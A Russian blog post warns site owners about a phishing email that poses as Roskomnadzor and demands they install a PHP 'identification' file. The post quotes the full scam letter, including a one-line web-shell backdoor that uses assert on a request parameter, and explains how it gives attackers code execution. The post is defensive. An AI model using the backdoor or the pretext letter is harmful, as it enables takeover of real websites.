AFX.RU

Сайт Влада Элбакяна

Новый развод для владельцев сайтов от имени Роскомнадзора

Развод владельцев сайтов от имени РоскомнадзораВ сети появился очередной развод для владельцев сайтов. Злоумышленники воспользовались активной деятельностью Роскомнадзора, который все подряд запрещает, и стали выступать от его имени. В данном случае владельцу сайта предлагается самостоятельно установить на него "идентификационный код", ну а попросту самостоятельно завязать веревку на своей шее :) Далее злоумышленники используя этот код могут творить сайте все что хотят, внедряя все что им в голову придет. Поскольку, как оказалось, рассылка таких "писем счастья" носит массовый характер, то просьба распространять информацию как можно шире, чтобы другие не попались!

Имейте в виду, что как только информация распространится и они поймут что их раскусили, то начнут менять внешний вид письма, адрес отправителя и т.д. В общем опять же кто-то из чайников может влететь.

 

Итак, вы получаете письмо такого вида:

 

27.08.2015, 00:22, "Роскомнадзор" <Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.;:

Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени moy_site.ru в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт moy_site.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени moy_site.ru, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени moy_site.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: moy_site.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени moy_site.ru, следую инструкции указанной выше, то Ваш сайт moy_site.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.[]

 

Вот такое вот письмецо приходит. При этом чудо сайт roskomnadzor.org создан всего неделю назад (адрес настоящего http://rkn.gov.ru/ ). А функция assert позволяет злоумышленникам выполнить на сайте любой код переданный в переменной roskomnadzor. Неплохо да?

 

Так что не ведитесь на такие письма и сразу посылайте их нафиг. И не говорите что я вас не предупреждал!

 

P.S. Глянул в инете, тема уже активно обсуждается на Хабрахабре http://habrahabr.ru/post/265515/ Так что рассылка идет широким фронтом, проинформируйте знакомых.

P.P.S. Экспериментально установлено, что письма идут на адреса указанные в контактных на самом сайте, а не на адреса регистрации домена.

 

Добавить комментарий

Минимальная длинна комментария 10 символов!


Защитный код
Обновить

Случайное Фото

Реклама